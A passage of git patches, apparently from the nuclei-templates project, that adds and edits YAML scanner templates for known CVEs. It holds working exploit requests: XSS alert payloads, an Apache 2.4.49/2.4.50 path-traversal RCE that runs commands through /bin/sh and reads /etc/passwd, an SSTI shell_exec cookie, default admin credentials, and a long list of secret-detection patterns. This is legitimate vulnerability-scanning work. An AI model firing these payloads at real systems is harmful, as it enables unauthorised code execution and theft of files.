XSS + description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. + severity: medium + tags: cve,cve2021,justwriting,xss + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878 + - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-41878 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/lostpassword.php/%22%3E%3Cimg%20src=a%20onerror=alert(1)%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header From 796dd93113f596f47836c1b41db40729de419e09 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 6 Oct 2021 15:53:31 +0530 Subject: [PATCH 2765/4083] Added Apache HTTPd - 2.4.49 (CGI enabled) RCE --- vulnerabilities/apache/apache-httpd-rce.yaml | 41 ++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 vulnerabilities/apache/apache-httpd-rce.yaml diff --git a/vulnerabilities/apache/apache-httpd-rce.yaml b/vulnerabilities/apache/apache-httpd-rce.yaml new file mode 100644 index 0000000000..b1de479889 --- /dev/null +++ b/vulnerabilities/apache/apache-httpd-rce.yaml @@ -0,0 +1,41 @@ +id: apache-httpd-rce + +info: + name: Apache HTTPd - 2.4.49 (CGI enabled) RCE + author: pdteam + severity: critical + description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + reference: + - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://twitter.com/ptswarm/status/1445376079548624899 + - https://github.com/blasty/CVE-2021-41773 + tags: cve,cve2021,rce,apache + +requests: + - raw: + - | + POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; id + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + condition: and + part: body + words: + - 'uid=' + - 'gid=' + - 'groups=' + + extractors: + - type: regex + regex: + - "(u|g)id=.*" \ No newline at end of file From 856b96a084c0c30c7d39d80353f62c48fbedd289 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 6 Oct 2021 15:56:00 +0530 Subject: [PATCH 2766/4083] lint update --- vulnerabilities/apache/apache-httpd-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/apache/apache-httpd-rce.yaml b/vulnerabilities/apache/apache-httpd-rce.yaml index b1de479889..e5f0bcbea2 100644 --- a/vulnerabilities/apache/apache-httpd-rce.yaml +++ b/vulnerabilities/apache/apache-httpd-rce.yaml @@ -18,7 +18,7 @@ requests: POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + echo Content-Type: text/plain; echo; id matchers-condition: and @@ -38,4 +38,4 @@ requests: extractors: - type: regex regex: - - "(u|g)id=.*" \ No newline at end of file + - "(u|g)id=.*" From 8dfa5ce9b43b2b219cd44121fcaf9517360c7c1f Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 6 Oct 2021 16:38:23 +0530 Subject: [PATCH 2767/4083] Added Lucee Unauthenticated Reflected XSS --- vulnerabilities/other/lucee-xss.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/lucee-xss.yaml diff --git a/vulnerabilities/other/lucee-xss.yaml b/vulnerabilities/other/lucee-xss.yaml new file mode 100644 index 0000000000..63a273a8a0 --- /dev/null +++ b/vulnerabilities/other/lucee-xss.yaml @@ -0,0 +1,24 @@ +id: lucee-xss + +info: + name: Lucee Unauthenticated Reflected XSS + author: incogbyte + severity: medium + tags: lucee,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm" + - "{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "" + - "MissingIncludeException" + - "lucee-err" + part: body + condition: and From 71b2c9ff29c427c4095114446e817db6f4792d4e Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 6 Oct 2021 18:14:12 +0530 Subject: [PATCH 2768/4083] Added AlphaWeb XE Default Login --- .../alphaweb/alphaweb-default-login.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 default-logins/alphaweb/alphaweb-default-login.yaml diff --git a/default-logins/alphaweb/alphaweb-default-login.yaml b/default-logins/alphaweb/alphaweb-default-login.yaml new file mode 100644 index 0000000000..6532087439 --- /dev/null +++ b/default-logins/alphaweb/alphaweb-default-login.yaml @@ -0,0 +1,35 @@ +id: alphaweb-default-login + +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + tags: default-login + reference: https://wiki.zenitel.com/wiki/AlphaWeb + +requests: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From e977b68118f721d3f802785a81da391cc9748df5 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 6 Oct 2021 20:35:02 +0530 Subject: [PATCH 2769/4083] adding this temporarily --- .nuclei-ignore | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index fe634beab1..26f85418fb 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -13,4 +13,9 @@ tags: - "misc" # files is a list of files to ignore template execution -# unless asked for by the user. \ No newline at end of file +# unless asked for by the user. + +files: + - "token-spray/" + + From b204eedff5bbfa27ad0c7f1640940fe042c2d7d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Oct 2021 23:55:26 +0530 Subject: [PATCH 2770/4083] Update CVE-2021-41467.yaml --- cves/2021/CVE-2021-41467.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml index ea9ecf2b44..67ba68c3a7 100644 --- a/cves/2021/CVE-2021-41467.yaml +++ b/cves/2021/CVE-2021-41467.yaml @@ -1,24 +1,25 @@ id: CVE-2021-41467 info: - author: madrobot name: JustWriting - Reflected XSS - description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + author: madrobot severity: medium - tags: cve,cve2021,justwriting,xss + description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 - https://github.com/hjue/JustWriting/issues/106 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-41467 cwe-id: CWE-79 + tags: cve,cve2021,justwriting,xss + requests: - method: GET path: - - '{{BaseURL}}/sync/dropbox/download?challenge=%3Cscript%3Ealert(1)%3C/script%3E' + - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,9 +29,8 @@ requests: - type: word words: - - "" + - "" part: body - condition: and - type: word words: From f0c69c4d830caa1fab148b80d684da583c74111d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Oct 2021 23:56:54 +0530 Subject: [PATCH 2771/4083] Update CVE-2021-41878.yaml --- cves/2021/CVE-2021-41878.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-41878.yaml b/cves/2021/CVE-2021-41878.yaml index 02acb4800a..cf2319a6ff 100644 --- a/cves/2021/CVE-2021-41878.yaml +++ b/cves/2021/CVE-2021-41878.yaml @@ -1,11 +1,10 @@ id: CVE-2021-41878 info: + name: JustWriting - Reflected XSS author: madrobot - name: JustWriting - Reflected XSS - description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. severity: medium - tags: cve,cve2021,justwriting,xss + description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878 - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html @@ -14,11 +13,12 @@ info: cvss-score: 6.10 cve-id: CVE-2021-41878 cwe-id: CWE-79 + tags: cve,cve2021,justwriting,xss requests: - method: GET path: - - '{{BaseURL}}/lostpassword.php/%22%3E%3Cimg%20src=a%20onerror=alert(1)%3E' + - '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,9 +28,8 @@ requests: - type: word words: - - "" + - "" part: body - condition: and - type: word words: From 590e7d128bec1bc4af83908042634df150306474 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Oct 2021 23:57:24 +0530 Subject: [PATCH 2772/4083] Update CVE-2021-41878.yaml --- cves/2021/CVE-2021-41878.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41878.yaml b/cves/2021/CVE-2021-41878.yaml index cf2319a6ff..e7e3b9eaa7 100644 --- a/cves/2021/CVE-2021-41878.yaml +++ b/cves/2021/CVE-2021-41878.yaml @@ -6,8 +6,8 @@ info: severity: medium description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878 - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 From 53fc9bcb3f7b1d5f343c0d16c7cdcd6fda5be849 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 7 Oct 2021 05:23:20 +0530 Subject: [PATCH 2773/4083] misc fixes --- cves/2020/CVE-2020-9757.yaml | 2 ++ default-logins/apache/superset-default-login.yaml | 4 ++-- vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 ++ vulnerabilities/other/rconfig-rce.yaml | 2 +- 4 files changed, 7 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index fac0befccd..20bf91e5e0 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -22,6 +22,8 @@ requests: path: - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" + + skip-variables-check: true matchers-condition: and matchers: - type: status diff --git a/default-logins/apache/superset-default-login.yaml b/default-logins/apache/superset-default-login.yaml index 26ec0e941e..6169088711 100644 --- a/default-logins/apache/superset-default-login.yaml +++ b/default-logins/apache/superset-default-login.yaml @@ -21,11 +21,11 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - csrf_token={{csrff_token}}&username=admin&password=admin + csrf_token={{csrf_token}}&username=admin&password=admin extractors: - type: regex - name: csrff_token + name: csrf_token group: 1 part: body internal: true diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index 889fd93cff..f1d82689fa 100644 --- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -12,6 +12,8 @@ requests: - "{{BaseURL}}" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" + + skip-variables-check: true matchers-condition: and matchers: - type: status diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index c08699eb6d..00bc474218 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -33,7 +33,7 @@ requests: --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="email" - test@{{randstr.tld}} + test@{{randstr}}.tld --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="editid" From a04df98f6f142702f683b8c9f9db0749d15144ad Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Thu, 7 Oct 2021 08:26:09 +0530 Subject: [PATCH 2774/4083] Update CVE-2021-41878.yaml --- cves/2021/CVE-2021-41878.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41878.yaml b/cves/2021/CVE-2021-41878.yaml index e7e3b9eaa7..4357fbd281 100644 --- a/cves/2021/CVE-2021-41878.yaml +++ b/cves/2021/CVE-2021-41878.yaml @@ -1,7 +1,7 @@ id: CVE-2021-41878 info: - name: JustWriting - Reflected XSS + name: i-Panel Administration System - Reflected XSS author: madrobot severity: medium description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. From 9384dd235ec5107f423d930ac80055f2ce2bff74 Mon Sep 17 00:00:00 2001 From: Naveen Sunkavally Date: Thu, 7 Oct 2021 14:17:29 -0400 Subject: [PATCH 2775/4083] template for CVE-2021-42013.yaml --- cves/2021/CVE-2021-42013.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2021/CVE-2021-42013.yaml diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml new file mode 100644 index 0000000000..926274ef16 --- /dev/null +++ b/cves/2021/CVE-2021-42013.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-42013 + +info: + name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution + author: nvn1729 + severity: critical + description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note: CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. + reference: + - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d + - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 + - https://twitter.com/itsecurityco/status/1446136957117943815 + tags: cve,cve2021,lfi,apache,rce,misconfig + +requests: + - raw: + - |+ + GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + + unsafe: true + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: word + words: + - "Apache" + part: header + + - type: status + status: + - 200 From 722841d86216fe36de80fc563a135a85232b1b63 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 7 Oct 2021 13:26:44 -0500 Subject: [PATCH 2776/4083] Create credential-exposure.yaml --- file/keys/credential-exposure.yaml | 715 +++++++++++++++++++++++++++++ 1 file changed, 715 insertions(+) create mode 100644 file/keys/credential-exposure.yaml diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml new file mode 100644 index 0000000000..40b98b7fab --- /dev/null +++ b/file/keys/credential-exposure.yaml @@ -0,0 +1,715 @@ +id: credentials-disclosure + +# Extract secrets regex like api keys, password, token, etc ... for different services +# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. +# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. +# Regex count:- 687 + +# Notes:- +# This template requires manual inspection once found valid match. +# Generic token could be anything matching below regex. +# Impact of leaked token depends on validation of leaked token. + +info: + name: Credentials Disclosure Check + author: Sy3Omda,geeknik + severity: info + description: Look for multiple keys/tokens/passwords hidden inside of files. + tags: exposure,token,file + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - "(?i)zopim[_-]?account[_-]?key(=| =|:| :).{1,32}" + - "(?i)zhuliang[_-]?gh[_-]?token(=| =|:| :).{1,32}" + - "(?i)zensonatypepassword(=| =|:| :).{1,32}" + - "(?i)zendesk[_-]?travis[_-]?github(=| =|:| :).{1,32}" + - "(?i)yt[_-]?server[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :).{1,32}" + - "(?i)yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)yt[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)yt[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :).{1,32}" + - "(?i)yt[_-]?account[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)yangshun[_-]?gh[_-]?token(=| =|:| :).{1,32}" + - "(?i)yangshun[_-]?gh[_-]?password(=| =|:| :).{1,32}" + - "(?i)www[_-]?googleapis[_-]?com(=| =|:| :).{1,32}" + - "(?i)wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :).{1,32}" + - "(?i)wpt[_-]?ssh[_-]?connect(=| =|:| :).{1,32}" + - "(?i)wpt[_-]?report[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)wpt[_-]?prepare[_-]?dir(=| =|:| :).{1,32}" + - "(?i)wpt[_-]?db[_-]?user(=| =|:| :).{1,32}" + - "(?i)wpt[_-]?db[_-]?password(=| =|:| :).{1,32}" + - "(?i)wporg[_-]?password(=| =|:| :).{1,32}" + - "(?i)wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)wordpress[_-]?db[_-]?user(=| =|:| :).{1,32}" + - "(?i)wordpress[_-]?db[_-]?password(=| =|:| :).{1,32}" + - "(?i)wincert[_-]?password(=| =|:| :).{1,32}" + - "(?i)widget[_-]?test[_-]?server(=| =|:| :).{1,32}" + - "(?i)widget[_-]?fb[_-]?password[_-]?3(=| =|:| :).{1,32}" + - "(?i)widget[_-]?fb[_-]?password[_-]?2(=| =|:| :).{1,32}" + - "(?i)widget[_-]?fb[_-]?password(=| =|:| :).{1,32}" + - "(?i)widget[_-]?basic[_-]?password[_-]?5(=| =|:| :).{1,32}" + - "(?i)widget[_-]?basic[_-]?password[_-]?4(=| =|:| :).{1,32}" + - "(?i)widget[_-]?basic[_-]?password[_-]?3(=| =|:| :).{1,32}" + - "(?i)widget[_-]?basic[_-]?password[_-]?2(=| =|:| :).{1,32}" + - "(?i)widget[_-]?basic[_-]?password(=| =|:| :).{1,32}" + - "(?i)watson[_-]?password(=| =|:| :).{1,32}" + - "(?i)watson[_-]?device[_-]?password(=| =|:| :).{1,32}" + - "(?i)watson[_-]?conversation[_-]?password(=| =|:| :).{1,32}" + - "(?i)wakatime[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)vscetoken(=| =|:| :).{1,32}" + - "(?i)visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)virustotal[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :).{1,32}" + - "(?i)vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :).{1,32}" + - "(?i)vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :).{1,32}" + - "(?i)v[_-]?sfdc[_-]?password(=| =|:| :).{1,32}" + - "(?i)v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)usertravis(=| =|:| :).{1,32}" + - "(?i)user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)use[_-]?ssh(=| =|:| :).{1,32}" + - "(?i)us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :).{1,32}" + - "(?i)urban[_-]?secret(=| =|:| :).{1,32}" + - "(?i)urban[_-]?master[_-]?secret(=| =|:| :).{1,32}" + - "(?i)urban[_-]?key(=| =|:| :).{1,32}" + - "(?i)unity[_-]?serial(=| =|:| :).{1,32}" + - "(?i)unity[_-]?password(=| =|:| :).{1,32}" + - "(?i)twitteroauthaccesstoken(=| =|:| :).{1,32}" + - "(?i)twitteroauthaccesssecret(=| =|:| :).{1,32}" + - "(?i)twitter[_-]?consumer[_-]?secret(=| =|:| :).{1,32}" + - "(?i)twitter[_-]?consumer[_-]?key(=| =|:| :).{1,32}" + - "(?i)twine[_-]?password(=| =|:| :).{1,32}" + - "(?i)twilio[_-]?token(=| =|:| :).{1,32}" + - "(?i)twilio[_-]?sid(=| =|:| :).{1,32}" + - "(?i)twilio[_-]?configuration[_-]?sid(=| =|:| :).{1,32}" + - "(?i)twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :).{1,32}" + - "(?i)twilio[_-]?api[_-]?secret(=| =|:| :).{1,32}" + - "(?i)twilio[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)trex[_-]?okta[_-]?client[_-]?token(=| =|:| :).{1,32}" + - "(?i)trex[_-]?client[_-]?token(=| =|:| :).{1,32}" + - "(?i)travis[_-]?token(=| =|:| :).{1,32}" + - "(?i)travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :).{1,32}" + - "(?i)travis[_-]?pull[_-]?request(=| =|:| :).{1,32}" + - "(?i)travis[_-]?gh[_-]?token(=| =|:| :).{1,32}" + - "(?i)travis[_-]?e2e[_-]?token(=| =|:| :).{1,32}" + - "(?i)travis[_-]?com[_-]?token(=| =|:| :).{1,32}" + - "(?i)travis[_-]?branch(=| =|:| :).{1,32}" + - "(?i)travis[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)travis[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)token[_-]?core[_-]?java(=| =|:| :).{1,32}" + - "(?i)thera[_-]?oss[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)tester[_-]?keys[_-]?password(=| =|:| :).{1,32}" + - "(?i)test[_-]?test(=| =|:| :).{1,32}" + - "(?i)test[_-]?github[_-]?token(=| =|:| :).{1,32}" + - "(?i)tesco[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)svn[_-]?pass(=| =|:| :).{1,32}" + - "(?i)surge[_-]?token(=| =|:| :).{1,32}" + - "(?i)surge[_-]?login(=| =|:| :).{1,32}" + - "(?i)stripe[_-]?public(=| =|:| :).{1,32}" + - "(?i)stripe[_-]?private(=| =|:| :).{1,32}" + - "(?i)strip[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)strip[_-]?publishable[_-]?key(=| =|:| :).{1,32}" + - "(?i)stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :).{1,32}" + - "(?i)stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)starship[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)starship[_-]?account[_-]?sid(=| =|:| :).{1,32}" + - "(?i)star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)star[_-]?test[_-]?location(=| =|:| :).{1,32}" + - "(?i)star[_-]?test[_-]?bucket(=| =|:| :).{1,32}" + - "(?i)star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :).{1,32}" + - "(?i)ssmtp[_-]?config(=| =|:| :).{1,32}" + - "(?i)sshpass(=| =|:| :).{1,32}" + - "(?i)srcclr[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :).{1,32}" + - "(?i)sqssecretkey(=| =|:| :).{1,32}" + - "(?i)sqsaccesskey(=| =|:| :).{1,32}" + - "(?i)spring[_-]?mail[_-]?password(=| =|:| :).{1,32}" + - "(?i)spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)spotify[_-]?api[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)spaces[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)soundcloud[_-]?password(=| =|:| :).{1,32}" + - "(?i)soundcloud[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)sonatypepassword(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?token[_-]?user(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?token[_-]?password(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?password(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?pass(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?nexus[_-]?password(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?gpg[_-]?passphrase(=| =|:| :).{1,32}" + - "(?i)sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :).{1,32}" + - "(?i)sonar[_-]?token(=| =|:| :).{1,32}" + - "(?i)sonar[_-]?project[_-]?key(=| =|:| :).{1,32}" + - "(?i)sonar[_-]?organization[_-]?key(=| =|:| :).{1,32}" + - "(?i)socrata[_-]?password(=| =|:| :).{1,32}" + - "(?i)socrata[_-]?app[_-]?token(=| =|:| :).{1,32}" + - "(?i)snyk[_-]?token(=| =|:| :).{1,32}" + - "(?i)snyk[_-]?api[_-]?token(=| =|:| :).{1,32}" + - "(?i)snoowrap[_-]?refresh[_-]?token(=| =|:| :).{1,32}" + - "(?i)snoowrap[_-]?password(=| =|:| :).{1,32}" + - "(?i)snoowrap[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)slate[_-]?user[_-]?email(=| =|:| :).{1,32}" + - "(?i)slash[_-]?developer[_-]?space[_-]?key(=| =|:| :).{1,32}" + - "(?i)slash[_-]?developer[_-]?space(=| =|:| :).{1,32}" + - "(?i)signing[_-]?key[_-]?sid(=| =|:| :).{1,32}" + - "(?i)signing[_-]?key[_-]?secret(=| =|:| :).{1,32}" + - "(?i)signing[_-]?key[_-]?password(=| =|:| :).{1,32}" + - "(?i)signing[_-]?key(=| =|:| :).{1,32}" + - "(?i)setsecretkey(=| =|:| :).{1,32}" + - "(?i)setdstsecretkey(=| =|:| :).{1,32}" + - "(?i)setdstaccesskey(=| =|:| :).{1,32}" + - "(?i)ses[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)ses[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)service[_-]?account[_-]?secret(=| =|:| :).{1,32}" + - "(?i)sentry[_-]?key(=| =|:| :).{1,32}" + - "(?i)sentry[_-]?secret(=| =|:| :).{1,32}" + - "(?i)sentry[_-]?endpoint(=| =|:| :).{1,32}" + - "(?i)sentry[_-]?default[_-]?org(=| =|:| :).{1,32}" + - "(?i)sentry[_-]?auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)sendwithus[_-]?key(=| =|:| :).{1,32}" + - "(?i)sendgrid[_-]?username(=| =|:| :).{1,32}" + - "(?i)sendgrid[_-]?user(=| =|:| :).{1,32}" + - "(?i)sendgrid[_-]?password(=| =|:| :).{1,32}" + - "(?i)sendgrid[_-]?key(=| =|:| :).{1,32}" + - "(?i)sendgrid[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)sendgrid(=| =|:| :).{1,32}" + - "(?i)selion[_-]?selenium[_-]?host(=| =|:| :).{1,32}" + - "(?i)selion[_-]?log[_-]?level[_-]?dev(=| =|:| :).{1,32}" + - "(?i)segment[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)secretkey(=| =|:| :).{1,32}" + - 